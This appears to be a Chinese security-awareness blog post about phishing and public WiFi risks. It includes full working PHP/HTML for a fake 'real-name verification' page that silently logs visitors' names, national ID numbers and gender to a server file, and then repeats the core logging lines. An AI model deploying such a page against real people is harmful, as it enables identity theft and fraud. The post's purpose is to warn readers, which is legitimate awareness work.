很多人都听说过什么“打击网络犯罪”,“小心上钩”之类的。但是大家有没有想过,在喊这些口号的同时,你已经“上钩了”。
第一个就是你可能经常会下载一下XX东西,这时,网站说要登录账户什么的,你发现你又没有账号。网站突然有跳出来了一个可以使用第三方登录的界面。假如是QQ,你不小心输了真实的号码和密码,这时,别人就会记录你输的内容,进行盗号。特别是实名认证网站要是作假,那你就完了。这里我就拿PHP写一个网站私自记录信息的脚本。
<!DOCTYPE html>
<html>
<title>钓鱼网页实例</title>
<body>
<h1>--------------实名认证系统-------------- <h1>
<h5> <h5>
<form name="a" method="post">
<table width="200" border="1">
<tr>
<th scope="row">真实姓名</th>
<td><input type="text" name="a"/></td>
<td> </td>
</tr>
<tr>
<th scope="row">身份证号码</th>
<td><input type="text" name="b"/></td>
<td> </td>
</tr>
<tr>
<th scope="row">性别</th>
<td>男<input type="radio" name="c" value="男" />女<input type="radio" name="c" value="女" /></td>
<td><input type="submit" name="submit" value="提交"</td>
</tr>
</table>
</form>
<?php
$name=$_POST['a'];
$u=$_POST['b'];
$x=$_POST['c'];
$b="姓名:$name 身份证号码: $u 性别: $x \r\n";
file_put_contents ( 'name.txt', " $b " , FILE_APPEND );
?>
</body>
</html>
通过这段代码,记录者就可以把你的性别,名字,身份证号记录的name.txt里。真要的话,还会加上CSS,JavaScript和图片。如果不看网页源代码的话,谁也不知道那是真的还是假的。这个脚本里实际起作用的只有7行代码,就是
<?php
$name=$_POST['a'];
$u=$_POST['b'];
$x=$_POST['c'];
$b="姓名:$name 身份证号码: $u 性别: $x \r\n";
file_put_contents ( 'name.txt', " $b " , FILE_APPEND );
?>
第二个就是公共场合宁肯浪费流量也不要连WIFI。因为公共场合了公共WIFI风险非常大。拿一个抓包软件,就可以轻轻松松抓到你的账号密码之类的。甚至有时可以拿软件进行改包,连安全的也变成危险的了。
本期就到这里了。下期会不定时发表。